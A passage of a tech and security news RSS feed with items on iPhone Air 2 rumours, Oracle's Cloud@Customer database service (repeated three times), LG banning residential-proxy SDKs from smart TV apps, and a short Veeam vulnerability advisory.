<title><![CDATA[iPhone Air 2 Release Date, Features, Camera, Battery and Everything We Know]]></title>
<description><![CDATA[Apple is already working on the second-generation iPhone Air, and early reports suggest it will fix several of the biggest complaints about the first model. While the original iPhone Air impressed buyers with its ultra-thin design, many users wanted better cameras, longer battery life, and improv...]]></description>
<link>https://tsecurity.de/de/3688250/ios-mac-os/iphone-air-2-release-date-features-camera-battery-and-everything-we-know/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688250/ios-mac-os/iphone-air-2-release-date-features-camera-battery-and-everything-we-know/</guid>
<pubDate>Thu, 23 Jul 2026 09:13:24 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple is already working on the second-generation iPhone Air, and early reports suggest it will fix several of the biggest complaints about the first model. While the original iPhone Air impressed buyers with its ultra-thin design, many users wanted better cameras, longer battery life, and improved sustained performance.



The upcoming iPhone Air 2 is expected to bring meaningful hardware upgrades while keeping the slim design that defines the Air lineup. Apple also appears to be changing its iPhone launch strategy, which means the next Air model may not arrive alongside the Pro models as many expected.



iPhone Air 2 at a glance



FeatureExpected DetailsRelease windowSpring 2027ProcessorA20 Pro built on 2nm processRear camerasDual cameras with Wide + Ultra WideBatteryAround 3,500mAhCoolingVapor chamber coolingDesignSimilar ultra-thin chassis



Will Apple release an iPhone Air 2?



There were reports earlier that Apple had paused development because the first iPhone Air did not sell as well as expected. 



Later reports clarified that Apple had not canceled the device. Instead, the company shifted its roadmap and continues to develop a second-generation model, which is currently believed to be in advanced testing under the internal codename V62.



A second rear camera is finally coming







The biggest limitation of the current iPhone Air is its single rear camera. Apple reportedly plans to solve that by adding a second lens.



Instead of using a telephoto camera, the company is expected to include an Ultra Wide sensor. This setup would match Apple's standard iPhone models and make the Air much more versatile for photography.



Expected camera improvements




48MP primary Wide camera



Ultra Wide secondary camera



Better landscape photography



Improved macro capabilities



More flexibility for video recording




A telephoto lens is still expected to remain exclusive to Pro models.



A20 Pro chip with 2nm technology







Another major upgrade is the processor.



The iPhone Air 2 is expected to use Apple's new A20 Pro chip, making it one of the first iPhones built on a 2-nanometer manufacturing process.



Apple is also expected to adopt Wafer-Level Multi-Chip Module technology, which integrates memory and the processor more efficiently. This design should improve both performance and power efficiency.



Expected benefits




Faster CPU performance



Better graphics performance



Lower power consumption



Improved AI processing



Longer battery life through better efficiency




Bigger battery without sacrificing thinness







Battery life was another common complaint about the first iPhone Air. Apple reportedly plans to address that with both hardware and silicon improvements.



Supply chain information suggests the iPhone Air 2 will include a battery around 3,500mAh, compared to the current 3,149mAh battery.



That represents roughly an 11 percent increase in capacity before accounting for the efficiency gains from the A20 Pro chip. While Apple has not confirmed real-world battery figures, users should expect noticeably longer endurance than the current generation.



Vapor chamber cooling arrives







Apple first introduced vapor chamber cooling on its Pro iPhones, and the technology is now expected to reach the Air lineup.



This cooling system spreads heat more effectively across the phone, allowing the processor to maintain higher performance during demanding workloads.



That means users can expect:




Better gaming performance



Less thermal throttling



Cooler temperatures during extended use



More stable performance while editing videos or using AI features




Expected release date



Apple originally planned to launch the iPhone Air 2 alongside the iPhone 18 Pro lineup in September 2026.



More recent reports point to a different strategy.



Apple is now expected to launch:



ProductExpected launchiPhone 18 ProFall 2026iPhone 18 Pro MaxFall 2026Foldable iPhoneFall 2026iPhone 18Spring 2027iPhone Air 2Spring 2027



This split launch schedule would allow Apple to focus premium devices in the fall while introducing mainstream models several months later.



Wrap Up



Based on current reports, the iPhone Air 2 looks like a much more complete device than its predecessor. A second rear camera, a larger battery, a faster A20 Pro chip, and vapor chamber cooling directly address the biggest compromises of the first-generation model while preserving its ultra-thin design.



As with all early Apple leaks, these details remain unofficial until the company makes an announcement. If the current roadmap stays on track, the iPhone Air 2 should arrive in spring 2027 with a stronger feature set and a better balance between portability and everyday performance.]]></content:encoded>
</item>
<item>
<title><![CDATA[Intel Directed Package-Level Thermal Interrupts Slated For Linux 7.3]]></title>
<description><![CDATA[submitted by    /u/hulk14   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3687519/linux-tipps/intel-directed-package-level-thermal-interrupts-slated-for-linux-73/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687519/linux-tipps/intel-directed-package-level-thermal-interrupts-slated-for-linux-73/</guid>
<pubDate>Wed, 22 Jul 2026 22:15:50 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/hulk14"> /u/hulk14 </a> <br> <span><a href="https://www.phoronix.com/news/Intel-Direct-Pkg-Therm-Linux-73">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1v3f3kq/intel_directed_packagelevel_thermal_interrupts/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Oracle expands Cloud@Customer with new database service for mid-sized workloads]]></title>
<description><![CDATA[Oracle is expanding its Cloud@Customer on-premises portfolio with a managed database offering that it says will enable enterprises to run databases, applications, and AI agents in their own data centers, helping CIOs modernize mid-sized workloads while meeting data residency, regulatory, and low-...]]></description>
<link>https://tsecurity.de/de/3687239/ai-nachrichten/oracle-expands-cloudcustomer-with-new-database-service-for-mid-sized-workloads/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687239/ai-nachrichten/oracle-expands-cloudcustomer-with-new-database-service-for-mid-sized-workloads/</guid>
<pubDate>Wed, 22 Jul 2026 20:19:33 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Oracle is expanding its <a href="https://www.cio.com/article/649108/oracle-adds-compute-services-to-its-cloudcustomer-offering.html">Cloud@Customer on-premises portfolio</a> with a managed database offering that it says will enable enterprises to run databases, applications, and AI agents in their own data centers, helping CIOs modernize mid-sized workloads while meeting data residency, regulatory, and low-latency requirements.</p>



<p class="wp-block-paragraph">The hybrid cloud offering, Base Database Cloud@Customer, combines existing database and infrastructure services such as the Base Database Service and Data Infrastructure Cloud@Customer X11 platform. It is designed for enterprises that do not need the scale of Exadata Cloud@Customer but still want their infrastructure and AI capabilities on-premises, managed by Oracle, the company said.</p>



<p class="wp-block-paragraph">The Cloud@Customer X11 platform itself consists of two Oracle X11 compute servers and shared all-flash storage, offering up to 60 usable processor cores and 660 GB of memory per server, 47.2 TB of storage, and 10/25 GbE networking.</p>



<h2 class="wp-block-heading">For regulated industries or restricted connectivity</h2>



<p class="wp-block-paragraph">Analysts see the new offering filling a gap for enterprises that want the operational and economic benefits of the cloud but cannot send their data to a public cloud because of legal restrictions or technology limitations.</p>



<p class="wp-block-paragraph">These enterprises, according to <a href="https://www.hfsresearch.com/team/ashish-chaturvedi/" target="_blank" rel="noreferrer noopener">Ashish Chaturvedi</a>, executive research leader at HFS Research, are likely to be in regulated industries such as financial services, healthcare, government, and defense that must comply with data residency requirements, or needing low-latency access from remote sites to operational databases.</p>



<p class="wp-block-paragraph">The offering could also appeal to enterprises modernizing mid-sized workloads at remote locations or within individual business units that could never justify the investment in a <a href="https://www.infoworld.com/article/3633997/oracle-offers-price-performance-boost-with-exadata-x11m-update.html">full Exadata rack</a>, said <a href="https://www.linkedin.com/in/amitchandak78/">Amit Chandak</a>, chief analytics officer at IT consulting firm Kanerika.</p>



<p class="wp-block-paragraph">In all cases, Chaturvedi said, the appeal of the offering is its managed nature, which takes away the burden of looking after the underlying infrastructure.</p>



<p class="wp-block-paragraph">Deployment and maintenance becomes easier too, said <a href="https://moorinsightsstrategy.com/team/mike-leone/" target="_blank" rel="noreferrer noopener">Michael Leone</a>, principal analyst at Moor Strategy and Insights: “They get automation that mid-size teams rarely have the staff to build. Clustering, patching, standby databases, and backups arrive configured instead of hand-assembled because the offering is managed.”</p>



<p class="wp-block-paragraph">The economics are equally compelling, Chaturvedi said. The pay-as-you-go pricing model, combined with online compute scaling, helps enterprises avoid overprovisioning and paying license fees for idle cores, which is a “classic waste” of fixed on-premises systems, he said.</p>



<h2 class="wp-block-heading">Private AI behind the firewall</h2>



<p class="wp-block-paragraph">Beyond the operational and economic benefits, the architecture of the new offering enables databases, applications, VMs, and AI agents to be collocated on the same platform, removing what Chaturvedi called “the single biggest blocker” to AI adoption in regulated environments: the need to keep private data behind the firewall.</p>



<p class="wp-block-paragraph">“For a CIO in a regulated sector who wants to deploy AI agents but can’t let regulated data touch an external model API, that’s a real unlock,” Chaturvedi said.</p>



<p class="wp-block-paragraph">More so because most AI offerings, at least in their present form and state, cannot guarantee sensitive data protection, said <a href="https://www.infotech.com/profiles/igor-ikonnikov" target="_blank" rel="noreferrer noopener">Igor Ikonnikov</a>, advisory fellow at Info-Tech Research Group.</p>



<p class="wp-block-paragraph">Even if Base Database Cloud@Customer turns out more expensive than fully cloud-based options, “It’s still attractive as it eliminates reputational and economic risk caused by possible AI-induced data leakage,” Ikonnikov said.</p>



<p class="wp-block-paragraph">The offering’s consolidation of databases, applications, and AI agents will also simplify deployment of AI-based workflows, said Forrester principal analyst <a href="https://www.forrester.com/analyst-bio/noel-yuhanna/BIO852">Noel Yuhanna</a>. “It reduces stack complexity and helps accelerate development cycles, deliver real-time data, and eliminate data movement challenges.”</p>



<p class="wp-block-paragraph">Despite those advantages, Chandak cautioned that the offering is unlikely to see broad adoption outside Oracle’s existing customer base: “If a company isn’t already on Oracle, the pull is weak. You don’t buy into Oracle’s database just to get this.”</p>



<p class="wp-block-paragraph">Enterprises seeking similar hybrid cloud capabilities have no shortage of alternatives: AWS, Microsoft, Google Cloud, IBM, Dell Technologies, and HPE all offer combinations of on-premises infrastructure, cloud management, and AI services.</p>



<p class="wp-block-paragraph">However, those alternatives typically require customers to integrate multiple software and hardware components rather than consume them as a single managed offering.</p>



<p class="wp-block-paragraph">Oracle’s differentiation, although narrow, is hard to match, Chaturvedi said: “The vertical integration of database, engineered hardware, cloud management, high-availability architecture, and now private AI, all engineered together and delivered as a managed on-prem subscription should be genuinely convenient and attractive.”</p>



<p class="wp-block-paragraph">The offering is compatible with Oracle AI Database 26ai and Oracle Database 19c in Enterprise Edition and Standard Edition configurations. It also supports Oracle Real Application Clusters, Oracle Data Guard, and Zero Data Loss Recovery Appliance through Oracle-managed cloud automation for high availability and disaster recovery, the company said.</p>



<p class="wp-block-paragraph">Base Database Cloud@Customer is now generally available, Oracle said. It did not provide pricing.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.cio.com/article/4200176/oracle-expands-cloudcustomer-with-new-database-service-for-mid-sized-workloads.html">CIO</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Oracle expands Cloud@Customer with new database service for mid-sized workloads]]></title>
<description><![CDATA[Oracle is expanding its Cloud@Customer on-premises portfolio with a managed database offering that it says will enable enterprises to run databases, applications, and AI agents in their own data centers, helping CIOs modernize mid-sized workloads while meeting data residency, regulatory, and low-...]]></description>
<link>https://tsecurity.de/de/3687195/it-security-nachrichten/oracle-expands-cloudcustomer-with-new-database-service-for-mid-sized-workloads/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687195/it-security-nachrichten/oracle-expands-cloudcustomer-with-new-database-service-for-mid-sized-workloads/</guid>
<pubDate>Wed, 22 Jul 2026 19:56:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Oracle is expanding its <a href="https://www.cio.com/article/649108/oracle-adds-compute-services-to-its-cloudcustomer-offering.html">Cloud@Customer on-premises portfolio</a> with a managed database offering that it says will enable enterprises to run databases, applications, and AI agents in their own data centers, helping CIOs modernize mid-sized workloads while meeting data residency, regulatory, and low-latency requirements.</p>



<p class="wp-block-paragraph">The hybrid cloud offering, Base Database Cloud@Customer, combines existing database and infrastructure services such as the Base Database Service and Data Infrastructure Cloud@Customer X11 platform. It is designed for enterprises that do not need the scale of Exadata Cloud@Customer but still want their infrastructure and AI capabilities on-premises, managed by Oracle, the company said.</p>



<p class="wp-block-paragraph">The Cloud@Customer X11 platform itself consists of two Oracle X11 compute servers and shared all-flash storage, offering up to 60 usable processor cores and 660 GB of memory per server, 47.2 TB of storage, and 10/25 GbE networking.</p>



<h2 class="wp-block-heading">For regulated industries or restricted connectivity</h2>



<p class="wp-block-paragraph">Analysts see the new offering filling a gap for enterprises that want the operational and economic benefits of the cloud but cannot send their data to a public cloud because of legal restrictions or technology limitations.</p>



<p class="wp-block-paragraph">These enterprises, according to <a href="https://www.hfsresearch.com/team/ashish-chaturvedi/" target="_blank" rel="noreferrer noopener">Ashish Chaturvedi</a>, executive research leader at HFS Research, are likely to be in regulated industries such as financial services, healthcare, government, and defense that must comply with data residency requirements, or needing low-latency access from remote sites to operational databases.</p>



<p class="wp-block-paragraph">The offering could also appeal to enterprises modernizing mid-sized workloads at remote locations or within individual business units that could never justify the investment in a <a href="https://www.infoworld.com/article/3633997/oracle-offers-price-performance-boost-with-exadata-x11m-update.html">full Exadata rack</a>, said <a href="https://www.linkedin.com/in/amitchandak78/">Amit Chandak</a>, chief analytics officer at IT consulting firm Kanerika.</p>



<p class="wp-block-paragraph">In all cases, Chaturvedi said, the appeal of the offering is its managed nature, which takes away the burden of looking after the underlying infrastructure.</p>



<p class="wp-block-paragraph">Deployment and maintenance becomes easier too, said <a href="https://moorinsightsstrategy.com/team/mike-leone/" target="_blank" rel="noreferrer noopener">Michael Leone</a>, principal analyst at Moor Strategy and Insights: “They get automation that mid-size teams rarely have the staff to build. Clustering, patching, standby databases, and backups arrive configured instead of hand-assembled because the offering is managed.”</p>



<p class="wp-block-paragraph">The economics are equally compelling, Chaturvedi said. The pay-as-you-go pricing model, combined with online compute scaling, helps enterprises avoid overprovisioning and paying license fees for idle cores, which is a “classic waste” of fixed on-premises systems, he said.</p>



<h2 class="wp-block-heading">Private AI behind the firewall</h2>



<p class="wp-block-paragraph">Beyond the operational and economic benefits, the architecture of the new offering enables databases, applications, VMs, and AI agents to be collocated on the same platform, removing what Chaturvedi called “the single biggest blocker” to AI adoption in regulated environments: the need to keep private data behind the firewall.</p>



<p class="wp-block-paragraph">“For a CIO in a regulated sector who wants to deploy AI agents but can’t let regulated data touch an external model API, that’s a real unlock,” Chaturvedi said.</p>



<p class="wp-block-paragraph">More so because most AI offerings, at least in their present form and state, cannot guarantee sensitive data protection, said <a href="https://www.infotech.com/profiles/igor-ikonnikov" target="_blank" rel="noreferrer noopener">Igor Ikonnikov</a>, advisory fellow at Info-Tech Research Group.</p>



<p class="wp-block-paragraph">Even if Base Database Cloud@Customer turns out more expensive than fully cloud-based options, “It’s still attractive as it eliminates reputational and economic risk caused by possible AI-induced data leakage,” Ikonnikov said.</p>



<p class="wp-block-paragraph">The offering’s consolidation of databases, applications, and AI agents will also simplify deployment of AI-based workflows, said Forrester principal analyst <a href="https://www.forrester.com/analyst-bio/noel-yuhanna/BIO852">Noel Yuhanna</a>. “It reduces stack complexity and helps accelerate development cycles, deliver real-time data, and eliminate data movement challenges.”</p>



<p class="wp-block-paragraph">Despite those advantages, Chandak cautioned that the offering is unlikely to see broad adoption outside Oracle’s existing customer base: “If a company isn’t already on Oracle, the pull is weak. You don’t buy into Oracle’s database just to get this.”</p>



<p class="wp-block-paragraph">Enterprises seeking similar hybrid cloud capabilities have no shortage of alternatives: AWS, Microsoft, Google Cloud, IBM, Dell Technologies, and HPE all offer combinations of on-premises infrastructure, cloud management, and AI services.</p>



<p class="wp-block-paragraph">However, those alternatives typically require customers to integrate multiple software and hardware components rather than consume them as a single managed offering.</p>



<p class="wp-block-paragraph">Oracle’s differentiation, although narrow, is hard to match, Chaturvedi said: “The vertical integration of database, engineered hardware, cloud management, high-availability architecture, and now private AI, all engineered together and delivered as a managed on-prem subscription should be genuinely convenient and attractive.”</p>



<p class="wp-block-paragraph">The offering is compatible with Oracle AI Database 26ai and Oracle Database 19c in Enterprise Edition and Standard Edition configurations. It also supports Oracle Real Application Clusters, Oracle Data Guard, and Zero Data Loss Recovery Appliance through Oracle-managed cloud automation for high availability and disaster recovery, the company said.</p>



<p class="wp-block-paragraph">Base Database Cloud@Customer is now generally available, Oracle said. It did not provide pricing.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.cio.com/article/4200176/oracle-expands-cloudcustomer-with-new-database-service-for-mid-sized-workloads.html">CIO</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Oracle expands Cloud@Customer with new database service for mid-sized workloads]]></title>
<description><![CDATA[Oracle is expanding its Cloud@Customer on-premises portfolio with a managed database offering that it says will enable enterprises to run databases, applications, and AI agents in their own data centers, helping CIOs modernize mid-sized workloads while meeting data residency, regulatory, and low-...]]></description>
<link>https://tsecurity.de/de/3687189/it-nachrichten/oracle-expands-cloudcustomer-with-new-database-service-for-mid-sized-workloads/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687189/it-nachrichten/oracle-expands-cloudcustomer-with-new-database-service-for-mid-sized-workloads/</guid>
<pubDate>Wed, 22 Jul 2026 19:49:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Oracle is expanding its <a href="https://www.cio.com/article/649108/oracle-adds-compute-services-to-its-cloudcustomer-offering.html">Cloud@Customer on-premises portfolio</a> with a managed database offering that it says will enable enterprises to run databases, applications, and AI agents in their own data centers, helping CIOs modernize mid-sized workloads while meeting data residency, regulatory, and low-latency requirements.</p>



<p class="wp-block-paragraph">The hybrid cloud offering, Base Database Cloud@Customer, combines existing database and infrastructure services such as the Base Database Service and Data Infrastructure Cloud@Customer X11 platform. It is designed for enterprises that do not need the scale of Exadata Cloud@Customer but still want their infrastructure and AI capabilities on-premises, managed by Oracle, the company said.</p>



<p class="wp-block-paragraph">The Cloud@Customer X11 platform itself consists of two Oracle X11 compute servers and shared all-flash storage, offering up to 60 usable processor cores and 660 GB of memory per server, 47.2 TB of storage, and 10/25 GbE networking.</p>



<h2 class="wp-block-heading">For regulated industries or restricted connectivity</h2>



<p class="wp-block-paragraph">Analysts see the new offering filling a gap for enterprises that want the operational and economic benefits of the cloud but cannot send their data to a public cloud because of legal restrictions or technology limitations.</p>



<p class="wp-block-paragraph">These enterprises, according to <a href="https://www.hfsresearch.com/team/ashish-chaturvedi/" target="_blank" rel="noreferrer noopener">Ashish Chaturvedi</a>, executive research leader at HFS Research, are likely to be in regulated industries such as financial services, healthcare, government, and defense that must comply with data residency requirements, or needing low-latency access from remote sites to operational databases.</p>



<p class="wp-block-paragraph">The offering could also appeal to enterprises modernizing mid-sized workloads at remote locations or within individual business units that could never justify the investment in a <a href="https://www.infoworld.com/article/3633997/oracle-offers-price-performance-boost-with-exadata-x11m-update.html">full Exadata rack</a>, said <a href="https://www.linkedin.com/in/amitchandak78/">Amit Chandak</a>, chief analytics officer at IT consulting firm Kanerika.</p>



<p class="wp-block-paragraph">In all cases, Chaturvedi said, the appeal of the offering is its managed nature, which takes away the burden of looking after the underlying infrastructure.</p>



<p class="wp-block-paragraph">Deployment and maintenance becomes easier too, said <a href="https://moorinsightsstrategy.com/team/mike-leone/" target="_blank" rel="noreferrer noopener">Michael Leone</a>, principal analyst at Moor Strategy and Insights: “They get automation that mid-size teams rarely have the staff to build. Clustering, patching, standby databases, and backups arrive configured instead of hand-assembled because the offering is managed.”</p>



<p class="wp-block-paragraph">The economics are equally compelling, Chaturvedi said. The pay-as-you-go pricing model, combined with online compute scaling, helps enterprises avoid overprovisioning and paying license fees for idle cores, which is a “classic waste” of fixed on-premises systems, he said.</p>



<h2 class="wp-block-heading">Private AI behind the firewall</h2>



<p class="wp-block-paragraph">Beyond the operational and economic benefits, the architecture of the new offering enables databases, applications, VMs, and AI agents to be collocated on the same platform, removing what Chaturvedi called “the single biggest blocker” to AI adoption in regulated environments: the need to keep private data behind the firewall.</p>



<p class="wp-block-paragraph">“For a CIO in a regulated sector who wants to deploy AI agents but can’t let regulated data touch an external model API, that’s a real unlock,” Chaturvedi said.</p>



<p class="wp-block-paragraph">More so because most AI offerings, at least in their present form and state, cannot guarantee sensitive data protection, said <a href="https://www.infotech.com/profiles/igor-ikonnikov" target="_blank" rel="noreferrer noopener">Igor Ikonnikov</a>, advisory fellow at Info-Tech Research Group.</p>



<p class="wp-block-paragraph">Even if Base Database Cloud@Customer turns out more expensive than fully cloud-based options, “It’s still attractive as it eliminates reputational and economic risk caused by possible AI-induced data leakage,” Ikonnikov said.</p>



<p class="wp-block-paragraph">The offering’s consolidation of databases, applications, and AI agents will also simplify deployment of AI-based workflows, said Forrester principal analyst <a href="https://www.forrester.com/analyst-bio/noel-yuhanna/BIO852">Noel Yuhanna</a>. “It reduces stack complexity and helps accelerate development cycles, deliver real-time data, and eliminate data movement challenges.”</p>



<p class="wp-block-paragraph">Despite those advantages, Chandak cautioned that the offering is unlikely to see broad adoption outside Oracle’s existing customer base: “If a company isn’t already on Oracle, the pull is weak. You don’t buy into Oracle’s database just to get this.”</p>



<p class="wp-block-paragraph">Enterprises seeking similar hybrid cloud capabilities have no shortage of alternatives: AWS, Microsoft, Google Cloud, IBM, Dell Technologies, and HPE all offer combinations of on-premises infrastructure, cloud management, and AI services.</p>



<p class="wp-block-paragraph">However, those alternatives typically require customers to integrate multiple software and hardware components rather than consume them as a single managed offering.</p>



<p class="wp-block-paragraph">Oracle’s differentiation, although narrow, is hard to match, Chaturvedi said: “The vertical integration of database, engineered hardware, cloud management, high-availability architecture, and now private AI, all engineered together and delivered as a managed on-prem subscription should be genuinely convenient and attractive.”</p>



<p class="wp-block-paragraph">The offering is compatible with Oracle AI Database 26ai and Oracle Database 19c in Enterprise Edition and Standard Edition configurations. It also supports Oracle Real Application Clusters, Oracle Data Guard, and Zero Data Loss Recovery Appliance through Oracle-managed cloud automation for high availability and disaster recovery, the company said.</p>



<p class="wp-block-paragraph">Base Database Cloud@Customer is now generally available, Oracle said. It did not provide pricing.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[A bizarre new malware campaign hacks your printer and forces it to print out ransomware demands]]></title>
<description><![CDATA[Researchers detail two incidents in Latin America in which system misconfigurations resulted in ransomware attacks.]]></description>
<link>https://tsecurity.de/de/3687132/it-nachrichten/a-bizarre-new-malware-campaign-hacks-your-printer-and-forces-it-to-print-out-ransomware-demands/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687132/it-nachrichten/a-bizarre-new-malware-campaign-hacks-your-printer-and-forces-it-to-print-out-ransomware-demands/</guid>
<pubDate>Wed, 22 Jul 2026 19:18:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Researchers detail two incidents in Latin America in which system misconfigurations resulted in ransomware attacks.]]></content:encoded>
</item>
<item>
<title><![CDATA[LG To Ban Residential Proxies From Smart TV Apps]]></title>
<description><![CDATA[An anonymous reader quotes a report from KrebsOnSecurity: The home appliance giant LG Electronics USA said this week it plans to suspend any apps built for its smart TVs that turn one's television into an always-on residential proxy node. The move comes less than a month after researchers found t...]]></description>
<link>https://tsecurity.de/de/3686990/it-security-nachrichten/lg-to-ban-residential-proxies-from-smart-tv-apps/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686990/it-security-nachrichten/lg-to-ban-residential-proxies-from-smart-tv-apps/</guid>
<pubDate>Wed, 22 Jul 2026 18:20:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous reader quotes a report from KrebsOnSecurity: The home appliance giant LG Electronics USA said this week it plans to suspend any apps built for its smart TVs that turn one's television into an always-on residential proxy node. The move comes less than a month after researchers found that more than 42 percent of games and other apps available for download on LG's webOS store allow unknown third-parties to route their Internet traffic through a user's TV. On July 2, [KrebsOnSecurity] featured research by the security firm Spur that examined the prevalence of residential proxy software development kits (SDKs) in smart TV apps. Spur found more than 42 percent of apps available for download on LG smart TVs include SDKs that turn one's television in a proxy node indefinitely, and that more than a quarter of the apps made for Samsung's Tizen operating system had similar residential proxy components.
 
Responding to questions about Spur's research, LG Senior Vice President John Taylor told KrebsOnSecurity the company was working with app developers to remove the residential proxy option from their apps on the webOS platform. Developers that fail to comply, he said, will find their apps suspended. "A residential proxy network is not an intended use for LG smart TVs, and LG Electronics is working with developers to remove the residential proxy option from their apps on the webOS platform," Taylor said. "If this option is not removed, these apps will be suspended." Taylor said LG is committed to keeping residential proxy networks out of its smart TV apps going forward, and that the company's review of those apps is "well underway now."
 
"As part of our ongoing efforts to enhance platform quality and the user experience, LG will continue to strengthen our evaluation process for developer-submitted apps, including those that incorporate residential proxy SDKs," Taylor wrote in an emailed statement. [...] "A one-time consent prompt buried in a TV app is not a substitute for meaningful transparency, ongoing control, and platform oversight," Spur's Trevor Sutter wrote. "The risk is amplified when consent comes from individuals within the household who use the device but shouldn't give consent, such as minors." LG is also facing criticism for monitors that automatically install software promoting paid McAfee subscriptions through Windows Update without user approval.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=LG+To+Ban+Residential+Proxies+From+Smart+TV+Apps%3A+https%3A%2F%2Fentertainment.slashdot.org%2Fstory%2F26%2F07%2F22%2F0426218%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fentertainment.slashdot.org%2Fstory%2F26%2F07%2F22%2F0426218%2Flg-to-ban-residential-proxies-from-smart-tv-apps%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://entertainment.slashdot.org/story/26/07/22/0426218/lg-to-ban-residential-proxies-from-smart-tv-apps?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-56844 | Veeam Software Appliance up to 13.0.1 Updater Local Privilege Escalation (EUVD-2026-47595)]]></title>
<description><![CDATA[A vulnerability classified as very critical has been found in Veeam Software Appliance up to 13.0.1. Impacted is an unknown function of the component Updater. This manipulation causes Local Privilege Escalation.

This vulnerability is registered as CVE-2026-56844. The attack needs to be launched ...]]></description>
<link>https://tsecurity.de/de/3685647/sicherheitsluecken/cve-2026-56844-veeam-software-appliance-up-to-1301-updater-local-privilege-escalation-euvd-2026-47595/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685647/sicherheitsluecken/cve-2026-56844-veeam-software-appliance-up-to-1301-updater-local-privilege-escalation-euvd-2026-47595/</guid>
<pubDate>Wed, 22 Jul 2026 10:31:30 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">very critical</a> has been found in <a href="https://vuldb.com/product/veeam:software_appliance">Veeam Software Appliance up to 13.0.1</a>. Impacted is an unknown function of the component <em>Updater</em>. This manipulation causes Local Privilege Escalation.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2026-56844">CVE-2026-56844</a>. The attack needs to be launched locally. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[LG to Ban Residential Proxies from Smart TV Apps]]></title>
<description><![CDATA[The home appliance giant LG Electronics USA said this week it plans to suspend any apps built for its smart TVs that turn one’s television into an always-on residential proxy node. The move comes less than a month after researchers…
Read more →
The post LG to Ban Residential Proxies from Smart TV...]]></description>
<link>https://tsecurity.de/de/3685105/it-security-nachrichten/lg-to-ban-residential-proxies-from-smart-tv-apps/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685105/it-security-nachrichten/lg-to-ban-residential-proxies-from-smart-tv-apps/</guid>
<pubDate>Wed, 22 Jul 2026 04:09:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The home appliance giant LG Electronics USA said this week it plans to suspend any apps built for its smart TVs that turn one’s television into an always-on residential proxy node. The move comes less than a month after researchers…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/lg-to-ban-residential-proxies-from-smart-tv-apps/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/lg-to-ban-residential-proxies-from-smart-tv-apps/">LG to Ban Residential Proxies from Smart TV Apps</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[LG to Ban Residential Proxies from Smart TV Apps]]></title>
<description><![CDATA[The home appliance giant LG Electronics USA said this week it plans to suspend any apps built for its smart TVs that turn one's television into an always-on residential proxy node. The move comes less than a month after researchers found that more than 42 percent of games and other apps available...]]></description>
<link>https://tsecurity.de/de/3685085/it-security-nachrichten/lg-to-ban-residential-proxies-from-smart-tv-apps/</link>
